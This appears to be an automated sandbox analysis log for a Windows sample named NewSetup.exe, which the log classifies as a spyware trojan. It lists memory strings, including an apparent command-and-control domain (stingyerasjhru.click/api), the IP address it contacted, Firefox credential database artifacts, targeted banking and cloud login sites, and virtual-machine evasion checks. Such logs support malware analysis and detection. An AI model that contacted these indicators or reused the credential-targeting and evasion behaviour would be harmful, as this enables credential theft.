Source: NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2240939627.00000000059FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/e&TI
Source: NewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/gT
Source: NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/l
Source: NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/l8T
Source: NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275459919.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/lJTm
Source: NewSetup.exe, 00000003.00000003.2240412235.00000000059FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/m
Source: NewSetup.exe, 00000003.00000003.2317960182.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292736706.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stingyerasjhru.click/nT
              Source: NewSetup.exe, 00000003.00000002.2322928451.0000000005A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/p
              Source: NewSetup.exe, 00000003.00000003.2273925137.0000000005A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click/s
              Source: NewSetup.exe, NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243462732.0000000003434000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273866612.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243225277.0000000003431000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.0000000003436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click:443/api
              Source: NewSetup.exe, 00000003.00000002.2322348607.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243462732.0000000003434000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2273866612.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292186863.0000000003436000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243225277.0000000003431000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292319702.0000000003436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click:443/apiault-release/key4.dbPK
              Source: NewSetup.exe, 00000003.00000003.2292319702.0000000003436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stingyerasjhru.click:443/apiicrosoft
              Source: NewSetup.exe, 00000003.00000003.2217303278.0000000005B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: NewSetup.exe, 00000003.00000003.2217303278.0000000005B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: NewSetup.exe, 00000003.00000002.2323001523.0000000005A0C000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2292481994.0000000005A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_
              Source: NewSetup.exe, 00000003.00000003.2240282371.0000000005A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: NewSetup.exeString found in binary or memory: https://www.entrust.net/rpa0
              Source: NewSetup.exe, 00000003.00000003.2167971704.0000000005A3D000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168035172.0000000005A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: NewSetup.exe, 00000003.00000003.2217185269.0000000005A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: NewSetup.exe, 00000003.00000003.2217185269.0000000005A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: NewSetup.exe, 00000003.00000003.2217303278.0000000005B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: NewSetup.exe, 00000003.00000003.2217303278.0000000005B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: NewSetup.exe, 00000003.00000003.2217303278.0000000005B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: NewSetup.exe, 00000003.00000003.2217523568.0000000005A0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknown | HTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49709 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49714 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 172.67.157.249:443 -> 192.168.2.6:49732 version: TLS 1.2
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 0_2_00211000 | 0_2_00211000
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 0_2_0021F555 | 0_2_0021F555
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 0_2_00237792 | 0_2_00237792
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 0_2_00235C5E | 0_2_00235C5E
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 0_2_00229CC0 | 0_2_00229CC0
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 0_2_00223FB2 | 0_2_00223FB2
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_2_00211000 | 3_2_00211000
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_2_0021F555 | 3_2_0021F555
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_2_00237792 | 3_2_00237792
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_2_00235C5E | 3_2_00235C5E
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_2_00229CC0 | 3_2_00229CC0
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_2_00223FB2 | 3_2_00223FB2
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_2_00438000 | 3_2_00438000
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_2_004269E0 | 3_2_004269E0
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_2_0040E1FA | 3_2_0040E1FA
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_2_0043F1A0 | 3_2_0043F1A0
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_2_004219B0 | 3_2_004219B0
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: String function: 00220730 appears 38 times
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: String function: 002280F8 appears 42 times
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: String function: 0022CFD6 appears 40 times
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: String function: 0021FAE4 appears 34 times
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: String function: 0021FA60 appears 100 times
              Source: NewSetup.exe | Static PE information: invalid certificate
              Source: NewSetup.exe, 00000000.00000000.2111803141.000000000029E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMuiUnattend.exej% vs NewSetup.exe
              Source: NewSetup.exe, 00000000.00000002.2121450452.0000000004A9E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMuiUnattend.exej% vs NewSetup.exe
              Source: NewSetup.exe, 00000003.00000000.2120867204.000000000029E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMuiUnattend.exej% vs NewSetup.exe
              Source: NewSetup.exe, 00000003.00000003.2121411665.0000000003245000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMuiUnattend.exej% vs NewSetup.exe
              Source: NewSetup.exe | Binary or memory string: OriginalFilenameMuiUnattend.exej% vs NewSetup.exe
              Source: NewSetup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: NewSetup.exe | Static PE information: Section: .bss ZLIB complexity 1.0003282289933444
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/1@1/1
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5940:120:WilError_03
              Source: NewSetup.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\NewSetup.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: NewSetup.exe, 00000003.00000003.2168549065.0000000005A0A000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2168287632.0000000005A28000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2193498627.0000000005A1C000.00000004.00000800.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2193403881.0000000005A29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: NewSetup.exe | ReversingLabs: Detection: 36%
              Source: C:\Users\user\Desktop\NewSetup.exe | File read: C:\Users\user\Desktop\NewSetup.exe
              Source: unknown | Process created: C:\Users\user\Desktop\NewSetup.exe "C:\Users\user\Desktop\NewSetup.exe"
              Source: C:\Users\user\Desktop\NewSetup.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\NewSetup.exe | Process created: C:\Users\user\Desktop\NewSetup.exe "C:\Users\user\Desktop\NewSetup.exe"
              Source: C:\Users\user\Desktop\NewSetup.exe | Process created: C:\Users\user\Desktop\NewSetup.exe "C:\Users\user\Desktop\NewSetup.exe"
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: acgenral.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: samcli.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: msacm32.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: dwmapi.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: mpr.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: winmmbase.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: winmmbase.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: aclayers.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: sfc.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: sfc_os.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: acgenral.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: samcli.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: msacm32.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: dwmapi.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: mpr.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: winmmbase.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: winmmbase.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: aclayers.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: sfc.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: sfc_os.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: webio.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\NewSetup.exe | Section loaded: ondemandconnroutehelper.dll
              Source: NewSetup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: NewSetup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: NewSetup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: NewSetup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: NewSetup.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: NewSetup.exe | Static PE information: real checksum: 0x8d404 should be: 0x96cf3
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 0_2_0021FB83 push ecx; ret | 0_2_0021FB96
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_033E6E78 push ds; iretd | 3_3_033E6E7B
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_033E6E78 push ds; iretd | 3_3_033E6E7B
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_034383DA pushad ; retf | 3_3_03438401
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_033E6E78 push ds; iretd | 3_3_033E6E7B
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_3_033E6E78 push ds; iretd | 3_3_033E6E7B
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_2_0021FB83 push ecx; ret | 3_2_0021FB96
              Source: C:\Users\user\Desktop\NewSetup.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\NewSetup.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\NewSetup.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\NewSetup.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\NewSetup.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_0-20518
              Source: C:\Users\user\Desktop\NewSetup.exe | API coverage: 2.1 %
              Source: C:\Users\user\Desktop\NewSetup.exe TID: 5100 | Thread sleep time: -120000s >= -30000s
              Source: C:\Users\user\Desktop\NewSetup.exe TID: 5100 | Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\NewSetup.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 0_2_00231F38 FindFirstFileExW, | 0_2_00231F38
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 0_2_00231FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose, | 0_2_00231FE9
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_2_00231F38 FindFirstFileExW, | 3_2_00231F38
              Source: C:\Users\user\Desktop\NewSetup.exe | Code function: 3_2_00231FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose, | 3_2_00231FE9
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: NewSetup.exe, NewSetup.exe, 00000003.00000002.2322348607.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2167294440.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2274012415.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243516642.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275542472.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322348607.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243277695.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2318084383.00000000033E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696487552p
              Source: NewSetup.exe, 00000003.00000003.2167294440.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2274012415.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243516642.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2275542472.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000002.2322348607.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2243277695.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, NewSetup.exe, 00000003.00000003.2318084383.00000000033E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW]
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
              Source: NewSetup.exe, 00000003.00000003.2192872472.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
